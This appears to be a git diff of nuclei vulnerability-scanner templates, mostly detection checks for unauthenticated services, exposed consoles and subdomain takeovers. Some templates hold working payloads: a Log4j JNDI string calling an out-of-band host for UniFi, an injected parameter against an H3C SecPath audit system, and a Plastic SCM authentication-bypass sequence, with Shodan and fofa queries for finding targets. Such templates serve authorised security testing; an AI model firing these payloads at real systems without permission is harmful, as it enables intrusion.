and + matchers: + - type: word + words: + - '"username":"anonymous"' + - '"Administrator"' + - '"newPassword":""' + condition: and + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthenticated-influxdb-10903.yaml b/nuclei-templates/Other/unauthenticated-influxdb-10903.yaml new file mode 100644 index 0000000000..4cd617572a --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-influxdb-10903.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-influxdb + +info: + name: Unauthentication InfluxDB Detection + author: pussycat0x + severity: high + metadata: + shodan-dork: InfluxDB + tags: unauth,db,influxdb,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/unauthenticated-influxdb.yaml b/nuclei-templates/Other/unauthenticated-influxdb.yaml deleted file mode 100644 index 063d0eedc5..0000000000 --- a/nuclei-templates/Other/unauthenticated-influxdb.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-influxdb -info: - name: Unauthentication InfluxDB Detection - author: pussycat0x - severity: high - metadata: - shodan-dork: InfluxDB - tags: unauth,db,influxdb,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"results":' - - '"name":"databases"' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthenticated-lansweeper-10904.yaml b/nuclei-templates/Other/unauthenticated-lansweeper-10904.yaml deleted file mode 100644 index c7c5563863..0000000000 --- a/nuclei-templates/Other/unauthenticated-lansweeper-10904.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: unauthenticated-lansweeper - -info: - name: Unauthenticated Lansweeper Instance - author: divya_mudgal - severity: high - tags: lansweeper,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/Default.aspx" - - matchers: - - type: word - words: - - "Main page - Lansweeper" \ No newline at end of file diff --git a/nuclei-templates/Other/unauthenticated-lansweeper-10906.yaml b/nuclei-templates/Other/unauthenticated-lansweeper-10906.yaml new file mode 100644 index 0000000000..4519fc8de7 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-lansweeper-10906.yaml @@ -0,0 +1,14 @@ +id: unauthenticated-lansweeper +info: + name: Unauthenticated Lansweeper Instance + author: divya_mudgal + severity: high + tags: lansweeper,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/Default.aspx" + matchers: + - type: word + words: + - "Main page - Lansweeper" diff --git a/nuclei-templates/Other/unauthenticated-mongo-express-10908.yaml b/nuclei-templates/Other/unauthenticated-mongo-express-10908.yaml new file mode 100644 index 0000000000..6396514361 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-mongo-express-10908.yaml @@ -0,0 +1,23 @@ +id: unauthenticated-mongo-express +info: + name: Mongo Express Unauthenticated + author: dhiyaneshDK,b0rn2r00t + severity: high + reference: https://www.exploit-db.com/ghdb/5684 + tags: mongo,unauth +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mongo-express/' + - '{{BaseURL}}/db/admin/system.users' + matchers-condition: and + matchers: + - type: word + words: + - 'Home - Mongo Express' + - 'system.users - Mongo Express' + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml b/nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml deleted file mode 100644 index da55b10013..0000000000 --- a/nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: unauthenticated-mongo-express - -info: - name: Mongo Express Unauthenticated - author: dhiyaneshDK,b0rn2r00t - severity: high - reference: https://www.exploit-db.com/ghdb/5684 - tags: mongo,unauth - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/mongo-express/' - - '{{BaseURL}}/db/admin/system.users' - - matchers-condition: and - matchers: - - type: word - words: - - 'Home - Mongo Express' - - 'system.users - Mongo Express' - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthenticated-nacos-access-10912.yaml b/nuclei-templates/Other/unauthenticated-nacos-access.yaml similarity index 100% rename from nuclei-templates/Other/unauthenticated-nacos-access-10912.yaml rename to nuclei-templates/Other/unauthenticated-nacos-access.yaml diff --git a/nuclei-templates/Other/unauthenticated-netdata-10916.yaml b/nuclei-templates/Other/unauthenticated-netdata-10916.yaml new file mode 100644 index 0000000000..8891415b48 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-netdata-10916.yaml @@ -0,0 +1,30 @@ +id: unauthenticated-netdata + +info: + name: Unauthenticated Netdata + author: dhiyaneshDk + severity: medium + reference: https://github.com/netdata/netdata + tags: netdata,unauth,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "view_update_every" + - "dimensions" + condition: and + + - type: word + words: + - "application/json" + part: header \ No newline at end of file diff --git a/nuclei-templates/Other/unauthenticated-netdata.yaml b/nuclei-templates/Other/unauthenticated-netdata.yaml deleted file mode 100644 index 4b9440c9e7..0000000000 --- a/nuclei-templates/Other/unauthenticated-netdata.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: unauthenticated-netdata -info: - name: Unauthenticated Netdata - author: dhiyaneshDk - severity: medium - reference: https://github.com/netdata/netdata - tags: netdata,unauth,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "view_update_every" - - "dimensions" - condition: and - - type: word - words: - - "application/json" - part: header diff --git a/nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml b/nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml index 5e5ec46c65..d1ef04ee57 100644 --- a/nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml +++ b/nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml @@ -2,10 +2,9 @@ id: unauthenticated-popup-upload info: name: Unauthenticated Popup File Uploader author: DhiyaneshDk - severity: info - reference: - - https://www.exploit-db.com/ghdb/6671 - tags: fileupload,upload + severity: low + reference: https://www.exploit-db.com/ghdb/6671 + tags: fileupload requests: - method: GET path: diff --git a/nuclei-templates/Other/unauthenticated-prtg-10928.yaml b/nuclei-templates/Other/unauthenticated-prtg-10924.yaml similarity index 100% rename from nuclei-templates/Other/unauthenticated-prtg-10928.yaml rename to nuclei-templates/Other/unauthenticated-prtg-10924.yaml diff --git a/nuclei-templates/Other/unauthenticated-tensorboard-10930.yaml b/nuclei-templates/Other/unauthenticated-tensorboard-10930.yaml deleted file mode 100644 index 88db2175d9..0000000000 --- a/nuclei-templates/Other/unauthenticated-tensorboard-10930.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: unauthenticated-tensorboard - -info: - name: Unauthenticated Tensorboard by Tensorflow - author: dhiyaneshDk - severity: high - tags: tensorflow,tensorboard,unauth - -requests: - - method: GET - path: - - '{{BaseURL}}/data/plugins_listing' - - matchers-condition: and - matchers: - - type: word - words: - - 'scalars' - - 'loading_mechanism' - - 'custom_scalars' - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/unauthenticated-tensorboard.yaml b/nuclei-templates/Other/unauthenticated-tensorboard.yaml new file mode 100644 index 0000000000..0eb9cb8157 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-tensorboard.yaml @@ -0,0 +1,24 @@ +id: unauthenticated-tensorboard +info: + name: Tensorflow Tensorboard - Unauthenticated Access + author: dhiyaneshDk + description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. + severity: high + tags: tensorflow,tensorboard,unauth +requests: + - method: GET + path: + - '{{BaseURL}}/data/plugins_listing' + matchers-condition: and + matchers: + - type: word + words: + - 'scalars' + - 'loading_mechanism' + - 'custom_scalars' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/20 diff --git a/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10931.yaml b/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10931.yaml new file mode 100644 index 0000000000..7f9941f12f --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10931.yaml @@ -0,0 +1,29 @@ +id: unauthenticated-varnish-cache-purge + +info: + name: Varnish Unauthenticated Cache Purge + author: 0xelkomy + severity: low + description: As per guideline one should protect purges with ACLs from unauthorized hosts. + reference: + - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html + - https://hackerone.com/reports/154278 + tags: varnish,misconfig,cache + +requests: + - method: PURGE + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '200 Purged' + - '"status": "ok"' + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10933.yaml b/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10933.yaml deleted file mode 100644 index 990e478a15..0000000000 --- a/nuclei-templates/Other/unauthenticated-varnish-cache-purge-10933.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: unauthenticated-varnish-cache-purge -info: - name: Varnish Unauthenticated Cache Purge - author: 0xelkomy - severity: low - description: As per guideline one should protect purges with ACLs from unauthorized hosts. - reference: - - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html - - https://hackerone.com/reports/154278 - tags: varnish,misconfig,cache - -requests: - - method: PURGE - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '200 Purged' - - '"status": "ok"' - condition: or - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthenticated-zipkin-10935.yaml b/nuclei-templates/Other/unauthenticated-zipkin-10935.yaml deleted file mode 100644 index 5e9454bd9c..0000000000 --- a/nuclei-templates/Other/unauthenticated-zipkin-10935.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauthenticated-zipkin -info: - name: Zipkin Discovery - author: dhiyaneshDk - severity: high - description: Unauthenticated access to Zipkin was discovered. - reference: - - https://zipkin.io/ - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/config.json" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'application/json' - part: header - - type: word - words: - - environment - - defaultLookback - part: body - condition: and - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/Other/unauthenticated-zipkin.yaml b/nuclei-templates/Other/unauthenticated-zipkin.yaml new file mode 100644 index 0000000000..31ddfe3077 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-zipkin.yaml @@ -0,0 +1,26 @@ +id: unauthenticated-zipkin +info: + name: Unauthenticated Zipkin + author: dhiyaneshDk + severity: high + description: Unauthenticated access to Zipkin + tags: unauth +requests: + - method: GET + path: + - "{{BaseURL}}/config.json" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'application/json' + part: header + - type: word + words: + - environment + - defaultLookback + part: body + condition: and diff --git a/nuclei-templates/Other/unauthenticated-zippkin-10937.yaml b/nuclei-templates/Other/unauthenticated-zippkin-10937.yaml deleted file mode 100644 index 984ff7a602..0000000000 --- a/nuclei-templates/Other/unauthenticated-zippkin-10937.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: unauthenticated-zippkin - -info: - name: Unauthenticated Zippkin - author: dhiyaneshDk - severity: high - description: Unauthenticated access to Zippkin - tags: unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/config.json" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'application/json' - part: header - - - type: word - words: - - environment - - defaultLookback - part: body - condition: and diff --git a/nuclei-templates/Other/unauthenticated-zippkin.yaml b/nuclei-templates/Other/unauthenticated-zippkin.yaml new file mode 100644 index 0000000000..7452622ed4 --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-zippkin.yaml @@ -0,0 +1,26 @@ +id: unauthenticated-zippkin +info: + name: Unauthenticated Zippkin + author: dhiyaneshDk + severity: high + description: Unauthenticated access to Zippkin + tags: unauth +requests: + - method: GET + path: + - "{{BaseURL}}/config.json" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'application/json' + part: header + - type: word + words: + - environment + - defaultLookback + part: body + condition: and diff --git a/nuclei-templates/Other/unauthorized-h3csecparh-login-10948.yaml b/nuclei-templates/Other/unauthorized-h3csecparh-login-10948.yaml deleted file mode 100644 index a4d8964e36..0000000000 --- a/nuclei-templates/Other/unauthorized-h3csecparh-login-10948.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: unauthorized-h3csecparh-login - -info: - name: H3C Server - Unauthenticated Access - author: ritikchaddha - severity: high - description: H3C server was able to be accessed with no authentication requirements in place. - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"H3C-SecPath-运维审计系统" - fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth,misconfig - -http: - - method: GET - path: - - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "admin" - - "审计管理员" - - "错误的id" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/unauthorized-h3csecparh-login.yaml b/nuclei-templates/Other/unauthorized-h3csecparh-login.yaml new file mode 100644 index 0000000000..84fde94cba --- /dev/null +++ b/nuclei-templates/Other/unauthorized-h3csecparh-login.yaml @@ -0,0 +1,26 @@ +id: unauthorized-h3csecparh-login +info: + name: Unauthorized H3C Secparh Login + author: ritikchaddha + severity: high + metadata: + verified: true + shodan-query: http.html:"H3C-SecPath-运维审计系统" + fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" + tags: h3c,default-login,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "admin" + - "审计管理员" + - "错误的id" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml b/nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml deleted file mode 100644 index ea53f2ba8f..0000000000 --- a/nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: unauthorized-hp-officepro-printer - -info: - name: Unauthorized HP office pro printer - author: pussycat0x - severity: high - metadata: - shodan-dork: http.title:"Hp Officejet pro" - tags: hp,iot,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: regex - regex: - - 'HP Officejet Pro([ 0-9A-Za-z]+)<\/title>' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml b/nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml new file mode 100644 index 0000000000..75df2eacb7 --- /dev/null +++ b/nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml @@ -0,0 +1,24 @@ +id: unauthorized-hp-officepro-printer + +info: + name: Unauthorized HP office pro printer + author: pussycat0x + severity: high + metadata: + shodan-dork: http.title:"Hp Officejet pro" + tags: hp,iot,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - '<title>HP Officejet Pro([ 0-9A-Za-z]+)<\/title>' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthorized-hp-printer-10951.yaml b/nuclei-templates/Other/unauthorized-hp-printer-10951.yaml new file mode 100644 index 0000000000..9f69be01e2 --- /dev/null +++ b/nuclei-templates/Other/unauthorized-hp-printer-10951.yaml @@ -0,0 +1,24 @@ +id: unauthorized-hp-printer + +info: + name: Unauthorized HP Printer + author: pussycat0x + severity: high + tags: hp,iot,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/SSI/Auth/ip_snmp.htm" + + matchers-condition: and + matchers: + - type: word + words: + - "HP" + - "<h1>SNMP</h1>" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthorized-hp-printer-10953.yaml b/nuclei-templates/Other/unauthorized-hp-printer-10953.yaml deleted file mode 100644 index ef6191d59c..0000000000 --- a/nuclei-templates/Other/unauthorized-hp-printer-10953.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: unauthorized-hp-printer -info: - name: Unauthorized HP Printer - author: pussycat0x - severity: high - tags: hp,iot,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/SSI/Auth/ip_snmp.htm" - matchers-condition: and - matchers: - - type: word - words: - - "HP" - - "<h1>SNMP</h1>" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthorized-plastic-scm-10955.yaml b/nuclei-templates/Other/unauthorized-plastic-scm-10955.yaml new file mode 100644 index 0000000000..6d7ae5c71c --- /dev/null +++ b/nuclei-templates/Other/unauthorized-plastic-scm-10955.yaml @@ -0,0 +1,50 @@ +id: unauthorized-plastic-scm +info: + name: Plastic Admin Console - Authentication Bypass + author: DEENA + severity: critical + description: A Plastic Admin console was discovered. + reference: + - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 + classification: + cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-288 + tags: plastic +requests: + - raw: + - | + GET /account/register HTTP/1.1 + {{Hostname}} + - | + POST /account/register HTTP/1.1 + Host: {{Hostname}} + Origin: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/account/register + Connection: close + + Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false + - | + GET /configuration HTTP/1.1 + {{Hostname}} + cookie-reuse: true + extractors: + - type: regex + part: body + internal: true + group: 1 + name: csrf + regex: + - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' + matchers-condition: and + matchers: + - type: word + words: + - "<title>Network - Plastic SCM" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/unauthorized-plastic-scm-10956.yaml b/nuclei-templates/Other/unauthorized-plastic-scm-10956.yaml deleted file mode 100644 index 6678abb0c6..0000000000 --- a/nuclei-templates/Other/unauthorized-plastic-scm-10956.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: unauthorized-plastic-scm - -info: - name: Unauthorized Access to Plastic Admin Console - author: DEENA - severity: critical - tags: plastic - reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 - -requests: - - raw: - - | - GET /account/register HTTP/1.1 - {{Hostname}} - - - | - POST /account/register HTTP/1.1 - Host: {{Hostname}} - Origin: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/account/register - Connection: close - - Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - - - | - GET /configuration HTTP/1.1 - {{Hostname}} - - cookie-reuse: true - extractors: - - type: regex - part: body - internal: true - group: 1 - name: csrf - regex: - - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' - - matchers-condition: and - matchers: - - type: word - words: - - "Network - Plastic SCM" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml b/nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml new file mode 100644 index 0000000000..d229013dd5 --- /dev/null +++ b/nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml @@ -0,0 +1,24 @@ +id: unauthorized-puppet-node-manager + +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml b/nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml deleted file mode 100644 index dd6e155d1a..0000000000 --- a/nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: unauthorized-puppet-node-manager -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unbounce-takeover-10970.yaml b/nuclei-templates/Other/unbounce-takeover-10970.yaml new file mode 100644 index 0000000000..6010316232 --- /dev/null +++ b/nuclei-templates/Other/unbounce-takeover-10970.yaml @@ -0,0 +1,18 @@ +id: unbounce-takeover + +info: + name: unbounce takeover detection + author: pdcommunity + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + regex: + - "^The requested URL was not found on this server.$" \ No newline at end of file diff --git a/nuclei-templates/Other/unbounce-takeover.yaml b/nuclei-templates/Other/unbounce-takeover.yaml deleted file mode 100644 index 64da5d194d..0000000000 --- a/nuclei-templates/Other/unbounce-takeover.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: unbounce-takeover -info: - name: unbounce takeover detection - author: pdcommunity - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: regex - regex: - - "^The requested URL was not found on this server.$" diff --git a/nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml b/nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml index d80088fb86..1c6bd1751b 100644 --- a/nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml +++ b/nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml @@ -1,23 +1,20 @@ -id: unencrypted-bigip-ltm-cookie - -info: - name: F5 BIGIP Unencrypted Cookie - author: PR3R00T - severity: info - reference: - - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values - - https://support.f5.com/csp/article/K23254150 - tags: misc - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - matchers: - - type: regex - regex: - - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' - - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' - part: header \ No newline at end of file +id: unencrypted-bigip-ltm-cookie +info: + name: F5 BIGIP Unencrypted Cookie + author: PR3R00T + severity: info + reference: + - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values + - https://support.f5.com/csp/article/K23254150 + tags: misc +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + matchers: + - type: regex + regex: + - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' + - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' + part: header diff --git a/nuclei-templates/Other/unifi-network-log4j-rce-10975.yaml b/nuclei-templates/Other/unifi-network-log4j-rce-10975.yaml index 40fd263e78..d91a0d8fda 100644 --- a/nuclei-templates/Other/unifi-network-log4j-rce-10975.yaml +++ b/nuclei-templates/Other/unifi-network-log4j-rce-10975.yaml @@ -1,17 +1,23 @@ id: unifi-network-log4j-rce - info: - name: UniFi Network Log4j JNDI RCE + name: UniFi Network Application - Remote Code Execution (Log4j) author: KrE80r severity: critical - description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application . + description: | + UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation. reference: - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e - https://twitter.com/sprocket_ed/status/1473301038832701441 - tags: rce,log4j,ubnt,unifi,oast,jndi,network + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 metadata: + verified: true shodan-query: http.title:"UniFi Network" - + tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi requests: - raw: - | @@ -22,22 +28,21 @@ requests: Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" # Confirms the DNS Interaction - + - "dns" # Confirms the DNS Interaction - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by mp on 2022/06/03 diff --git a/nuclei-templates/Other/unpatched-coldfusion.yaml b/nuclei-templates/Other/unpatched-coldfusion-10977.yaml similarity index 100% rename from nuclei-templates/Other/unpatched-coldfusion.yaml rename to nuclei-templates/Other/unpatched-coldfusion-10977.yaml diff --git a/nuclei-templates/Other/upnp-device-10982.yaml b/nuclei-templates/Other/upnp-device.yaml similarity index 100% rename from nuclei-templates/Other/upnp-device-10982.yaml rename to nuclei-templates/Other/upnp-device.yaml diff --git a/nuclei-templates/Other/ups-status-10984.yaml b/nuclei-templates/Other/ups-status-10984.yaml new file mode 100644 index 0000000000..481f53a7e8 --- /dev/null +++ b/nuclei-templates/Other/ups-status-10984.yaml @@ -0,0 +1,24 @@ +id: ups-status + +info: + name: Multimon UPS status page + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/752 + tags: logs,status + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/apcupsd/multimon.cgi" + - "{{BaseURL}}/cgi-bin/multimon.cgi" + + matchers-condition: and + matchers: + - type: word + words: + - "Multimon: UPS Status Page" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ups-status-10985.yaml b/nuclei-templates/Other/ups-status-10985.yaml deleted file mode 100644 index 7fb5ad7ba5..0000000000 --- a/nuclei-templates/Other/ups-status-10985.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: ups-status -info: - name: Multimon UPS status page - author: dhiyaneshDK - severity: low - reference: https://www.exploit-db.com/ghdb/752 - tags: logs -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/apcupsd/multimon.cgi" - - "{{BaseURL}}/cgi-bin/multimon.cgi" - matchers-condition: and - matchers: - - type: word - words: - - "Multimon: UPS Status Page" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/uptimerobot-takeover-10987.yaml b/nuclei-templates/Other/uptimerobot-takeover-10987.yaml index 07476af51e..544d8794ba 100644 --- a/nuclei-templates/Other/uptimerobot-takeover-10987.yaml +++ b/nuclei-templates/Other/uptimerobot-takeover-10987.yaml @@ -1,5 +1,4 @@ id: uptimerobot-takeover - info: name: uptimerobot takeover detection author: pdteam @@ -8,18 +7,15 @@ info: reference: - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: regex regex: - "^page not found$" - - type: status status: - - 404 \ No newline at end of file + - 404 diff --git a/nuclei-templates/Other/urge-takeover-10990.yaml b/nuclei-templates/Other/urge-takeover-10990.yaml deleted file mode 100644 index ca439a50bd..0000000000 --- a/nuclei-templates/Other/urge-takeover-10990.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: surge-takeover -info: - name: surge takeover detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - project not found diff --git a/nuclei-templates/Other/urge-takeover.yaml b/nuclei-templates/Other/urge-takeover.yaml new file mode 100644 index 0000000000..2454f1bb7b --- /dev/null +++ b/nuclei-templates/Other/urge-takeover.yaml @@ -0,0 +1,28 @@ +id: surge-takeover + +info: + name: surge takeover detection + author: pdteam + severity: high + description: surge takeover was detected. + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + metadata: + max-request: 1 + tags: takeover + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - Host != ip + + - type: word + words: + - project not found +# digest: 